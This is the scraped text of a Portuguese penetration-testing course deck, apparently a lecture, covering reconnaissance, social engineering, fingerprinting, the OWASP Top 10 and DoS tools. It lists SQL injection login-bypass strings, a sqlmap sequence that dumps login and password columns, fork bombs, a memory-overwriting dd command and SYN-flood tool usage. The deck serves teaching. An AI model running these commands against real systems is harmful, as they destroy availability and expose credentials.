Escolar Documentos
Profissional Documentos
Cultura Documentos
Trabalho:
Analista de Redes - Ncleo de Informtica do DNIT/PI
Formao:
Graduado em Tecnologia de Redes
Esp. em Segurana com nfase em Percia Forense
Certificaes:
ISO 27002 Information Security System ISFS
ITILV3 Information Technology Infrastructure Library
Lead/Auditor ISO/IEC 27001 ISMS
Consultor / Sebrae/PI:
Segurana da Informao, Anlise de Riscos e CN
Professor: Faculdade Maurcio de Nassau Parnaiba/PI
Ps em Gesto de Projetos de TI
Laboratrio:
Disponvel:
3 mquinas virtuais preparadas para
execuo dos ataques (.virtualbox)
Backtrack 5 R3
Kali Linux
Sobre mim...
Segurana da Informao
Teste de Invaso e aspectos legais
Levantamento de Informaes
Google Hacking
Engenharia Social
Varreduras Ativas, Passivas e Furtivas de Rede
Enumeraes de informaes e servios
Testando o Sistema
Objetivos
simular de forma controlada um ataque
real que normalmente executado por
criminosos.
Debian (metasploitable)
19/11/2014
Justificativa / Motivao
Entender reais riscos que vulnerabilidades
especficas apresentam ao negcio.
Segurana da Informao
Nossa Realidade
19/11/2014
Vulnerabilidades
AMEAAS
Riscos
ATAQUES
Vulnerabilidades
Fragilidade que pode fornecer uma
porta de entrada para um atacante.
Instalao:
Falta de mecanismo de
monitoramento
Proteo fsica inadequada
Energia eltrica instvel
Banco de dados:
Falta de backup
Armazenamento inadequado
Ameaas
Agente ou ao que se aproveita
de uma vulnerabilidade.
19/11/2014
Exemplos de Impacto
Riscos
a relao entre a probabilidade e o
impacto da ameaa ocorrer.
Ataques
Ataques
Incidncia da ameaa sobre a
vulnerabilidade.
Testes de Invaso
19/11/2014
Objetivos:
Fornecer uma viso geral sobre testes de
invaso
Tipos de Pentest
Gray Box:
Auditor tem conhecimento parcial do alvo, e
o alvo sabe que ser atacado e tambm sabe
quais testes sero realizados..
Double Gray Box :
Auditor tem conhecimento parcial do alvo, e
o alvo sabe que ser atacado, porm, no
sabe quais testes sero executados.
Tipos de Pentest
Blind:
Auditor no conhece nada sobre o alvo
que ir atacar, porm o alvo sabe que ser
atacado e o que ser feito durante o teste.
Double Blind:
Auditor no conhece nada sobre o alvo, e o
alvo no sabe que ser atacado e to pouco
sabe quais testes o auditor ir realizar.
Tipos de Pentest
Tandem: ( caixa de cristal )
Auditor tem total conhecimento sobre o
alvo, o alvo sabe que ser atacado e o que
ser feito durante o ataque.
19/11/2014
Autorizao
Motivao
Inteno
Manter acesso
Apagar rastros
Levantamento de Informaes
fase mais importante de um ataque e de
um teste de invaso. Baseado no que
descoberto nessa fase, todo o planejamento
realizado e os vetores de ataque definidos.
Concorrentes
Nome de Funcionrios
Endereos
Telefones
Sites
Empresas
Comunidades Sociais
Varredura
O atacante busca informaes mais detalhadas
do alvo, que permitir enxergar as possibilidades em
ganhar acesso ao sistema, atravs da explorao
de alguma falha encontrada.
Qual sistema operacional o alvo utiliza?
Quais os servios esto sendo executados no alvo?
Quais servios esto disponveis para acesso?
Qual a verso de cada servio sendo executado?
H IDS/IPS na rede?
H firewalls na rede?
Existe uma rede interna e outra externa, como uma DMZ?
19/11/2014
Ganhando acesso
O atacante coloca em prtica tudo
aquilo que planejou a partir das informaes
obtidas previamente.
Mantendo acesso
O atacante busca, de alguma forma,
manter o acesso conseguido atravs de
seus ataques.
O risco de configurar o sistema,
implantando uma backdoors que outras
pessoas podem descobri-las, explor-las e
ganhar acesso facilmente ao sistema
comprometido.
Metodologias existente
Apagar rastros
O atacante apaga todos os seus
rastros, todos os registros de operaes
realizadas dentro do sistema
comprometido.
Como o pentester tem AUTORIZAO
para realizar os testes, no necessrio
apagar os rastros.
19/11/2014
Estratgia no Levantamento de
Informaes
O levantamento passivo faz uso da vasta
quantidade de informaes disponveis na
web.
Quando conduzimos um levantamento
passivo, no interagirmos diretamente com
o alvo e, desse modo, ele no ter
nenhuma maneira de saber, gravar ou
registrar nossas atividades em um log.
Estratgia no Levantamento de
Informaes
Um levantamento de ativo inclui a interao
com o alvo:
O alvo pode gravar nosso endereo IP
e registrar nossas atividades em um log.
Isso tem uma chance bem alta de ser
detectado se estivermos tentando realizar
um teste de invaso de maneira discreta.
19/11/2014
Google Hacking
Google Hacking
Google Hacking a atividade de usar
recursos de busca do site, visando atacar ou
proteger melhor as informaes de uma
empresa.
Livros: Google Hacking for Penetration
Testers e Google Hacking Database.
Apresentao de Johnny long na Defcon 13.
http://www.defcon.org/html/links/dc-archives.html
Hands-on
19/11/2014
Webspiders
http://www.dominio.com.br/robots.txt
So programas que navegam automaticamente
por websites para coletar informaes.
FootPrint
a etapa a ser realizada em um teste de
intruso. Durante essa etapa, o Pentester coleta
o mximo de informaes para alimentar a
anatomia de ataque.
Ex: topologia da rede, sistemas operacionais,
quantidade de mquinas e localizao fsica.
Podemos dizer que a fase em que o
Pentester se prepara para realizar o ataque.
Footprint:
Em mdia, um pentester gasta 70% do
tempo analizando um alvo levantando
informaes sobre o mesmo.
Apenas 30% do tempo e usado para
realizar o ataque e avaliar a possibilidade de
um atacante realizar procedimentos psinvaso na mquina alvo.
10
19/11/2014
Netcraft
http://www.netcraft.com
Dentro de alguns servios que ela
fornece est a anlise de mercado para
empresas de web hosting e servidores
web, incluindo deteco do sistema
operacional e verso do servidor web,
Extraindo informaes do
cabealho do e-mail
Anlise de e-mails normalmente feita
pela rea de Forense Computacional.
Porm, podemos obter informaes
sobre o host da pessoa,
Extraindo informaes do
cabealho do e-mail
No cabealho onde encontramos diversos
campos com informaes de controle,
destinatrio, remetente, data de envio,
dentre outras informaes.
O campo que interessa ns o campo
Received onde contem o endereo IP de
onde a mensagem de correio eletrnico
partiu.
11
19/11/2014
Objetivos
Motivao
Fingerprint Passivo
Fica ouvindo a rede para coletar
informaes(S.O) sobre os dispositivos.
Linux - Normalmente 64
Windows - Normalmente 128
Cisco - Normalmente 255
Linux + iptables - Normalmente 255
12
19/11/2014
Calculando o HOP
Usando os comandos traceroute e
ping conjugados para obter
informaes, podemos calcular o ttl e
descobrir o S.O
# nmap v O <dominio.com.br>
Realiza varredura, buscando ativos, portas
abertas e servios sendo executados.
# xprobe2 <dominio.com.br>
# traceroute <domnio>
# mtr <dominio:>
Engenharia Social
Objetivos
Entender o que Engenharia Social
Entender Dumpster Diving
Engenharia Social
Arte de enganar pessoas para conseguir
informaes, as quais no deviam ter acesso.
13
19/11/2014
Tipos de ataques
Insider Attacks
Roubo de identidade
Phishing Scam
Dumpster Diving
Tipos de ataques
Tipos de ataques
Insider Attacks:
Insiders so pessoas de dentro da prpria
organizao.
Roubo de identidade:
Quando algum cria uma nova
identidade baseando-se em informaes de
outra pessoa, essa identidade chamada de
laranja.
Phishing Scam
Phishing Scam:
uma forma de fraude eletrnica,
caracterizada por tentativas de adquirir
informaes sigilosas, ou instalar programas
maliciosos na mquina alvo.
Dumpster Diving:
o ato de vasculhar lixeiras em busca de
informaes.
Engenheiros Sociais
http://ad.vu/zcfh?www.tse.gov.br/internet/servicos_eleitor/mesario.htm
14
19/11/2014
Navegao Annima
Anonymizer
Os programas de anonymizer funcionam
basicamente mascarando o IP fazendo com que se
navegue utilizando um proxy externo, fornecendo o
dele como IP real.
Verses pra Linux e Windows
TOR The Onion Router
http://www.torproject.org/
Acesse o site http://www.geoiptool.com e veja se
o IP est diferente, assim como o local de onde
est acessando.
Objetivos
Mapear a rede
Enumerao de Informaes e
Servios
15
19/11/2014
Enumerao
As tcnicas de enumerao so utilizadas
como um complemento s fases de
fingerprint e varredura.
Tcnicas Clssicas
Sem utilizar ferramentas especficas,
possvel conseguir informaes dos servios que
esto sendo executados em determinada porta.
Obtendo banner de um servidor ftp:
Ferramentas
Lanmap2
AutoScan
16
19/11/2014
Ferramentas
Lanmap2:
Varre toda a rede e captura pacotes, criando
ao longo de sua execuo um arquivo .PNG com
o mapa da rede, informando graficamente a
relao das mquinas encontradas.
Ferramentas
AutoScan:
Faz varredura na rede e informa hosts
ativos, portas abertas e servios sendo
executados. Funciona atravs de uma
interface grfica.
# pentest/enumeration/lanmap2/graph
net.png Arquivo gerado
Vulnerabilidades em Aplicaes
Web
17
19/11/2014
Objetivos
Entender o funcionamento das aplicaes
web.
Aprender a explorar as principais classes de
vulnerabilidades em aplicaes web.
Conceito
Aplicaes web so programas que ficam em
um servidor web e executam tarefas para dar
uma resposta ao usurio.
Webmails, web fruns, blogs, Lojas virtuais
etc... so exemplos de aplicaes web.
Top 10 OWASP
SQL Injection
Command Injection
Cross Site Scripting (XSS)
Insecure Direct Object Reference
Falha de Autenticao e gerenciamento de
sesso
Falhas em configurao de segurana
Insecure Cryptographic Storage
Failure to Restrict URL Access
Insufficient Transport Layer Protection
Unvalidated Redirects and Forwards
SQL Injection
SQL Injection um problema que ocorre
quando o programa no filtra caracteres
especiais enviados pelo usurio antes de
fazer a requisio para o banco de dados,
enviando caracteres que sero interpretados
pelo banco de dados.
18
19/11/2014
or 1=1
Resposta:
'or '1
'or '1'='1
'or 1=1-'or''='
'or 'a'='a
') or ('a'='a
'or '=1
Sqlmap
Exemplo:
http://dominio.com.br/?paginas=conteudo&id=10
# cd /pentest/database/sqlmap
Executar: (tentar extrair o nome da base de dados)
# ./sqlmap.py --url
http://dominio.com.br/?paginas=conteudo&id=10
--current-db
Sqlmap
Exemplo:
http://dominio.com.br/?paginas=conteudo&id=10
# cd /pentest/database/sqlmap
Executar: (tentar extrair tabelas)
# ./sqlmap.py --url
http://dominio.com.br/?paginas=conteudo&id=10 D
c1acpef -- tables
19
19/11/2014
Sqlmap
Exemplo:
http://dominio.com.br/?paginas=conteudo&id=10
# cd /pentest/database/sqlmap
Executar: (tentar extrair colunas da tabela login)
# ./sqlmap.py --url
http://dominio.com.br/?paginas=conteudo&id=10 D
c1acpef T login -- columns
Sqlmap
Exemplo:
http://dominio.com.br/?paginas=conteudo&id=10
# cd /pentest/database/sqlmap
http://dominio.com.br/?paginas=conteudo&id=10 D
c1acpef T login C login,senha --dump
Testando o Sistema
20
19/11/2014
Objetivos
Exemplos:
*puxar a tomada de alimentao de energia de um
servidor.
*at utilizar uma rede zumbi para ataque em
massa.
DoS
Na maior parte das vezes, o objetivo do
atacante no conseguir acesso
informaes, roubo de dados, ou tomar o
controle da mquina.
O objetivo realmente causar a
indisponibilidade de servios nos sistemas
do alvo, e isso pode levar a potenciais
prejuzos financeiros, do ponto de vista
comercial, por exemplo.
DoS
Realizado atravs de um nico computador.
Ping da Morte
ping -i 1 -l 65500 (ip de destino ou nome host) -t
21
19/11/2014
Exemplos de DoS
$ :(){ :|:& };:
$ dd if=/dev/zero of=/var/spool/mail/meu_usuario
$ perl e 'while (1) { fork();
open $fh, </proc/meminfo;
open $hf, >/tmp/bla; }'
$ dd if=/dev/urandom of=/dev/mem
$ perl -e 'fork while fork
Fork_Bomb
Em Windows:
Em um .bat: %0|%0
Ou:
:s
start %0
goto :s
Fork_Bomb
Ferramenta DoS
C4
Ferramenta que gera ataques de DoS em redes
locais com SYN Flood.
DDoS
# ./c4 -h [ip_alvo]
Parmetros:
-h destination ip/host
-p destination port range [start,end]
-t attack timeout
-l % of box link to use
22
19/11/2014
Ferramenta DDoS
Ferramentas DDoS
Loic (Windows, Mac e Linux)
Loic
SlowLoris
t50
Funcionamento:
O site alvo inundado com pacotes de
requisio TCP ou UDP com a inteno de
sobrecarregar o servidor, fazendo com que ele deixe
de responder s requisies legtimas.
frequente o uso de botnets para efetuar ataques
atravs do LOIC.
Ferramentas DDoS
SlowLoris
Funcionamento:
Tentar manter muitas conexes aberta com servidor
web destino e mant-los abertos o maior tempo
possvel at encher o mximo de conexes
simultnea.
Ferramentas DDoS
Ferramentas DDoS
23
19/11/2014
Ferramentas DDoS
Atualmente o t50 capaz de emitir as seguintes
requisies:
Mais de 1.000.000 (1 milho) de pacotes por
segundo de SYN Flood (+50% do uplink da rede)
em uma rede 1000BASE-T (Gigabit Ethernet).
Recomendaes
Exceto em casos que o cliente
solicite tal tipo de ataque, no devemos
realizar esse ataque, pois pode
prejudicar os negcios da empresa.
OBRIGADO!!!!!
24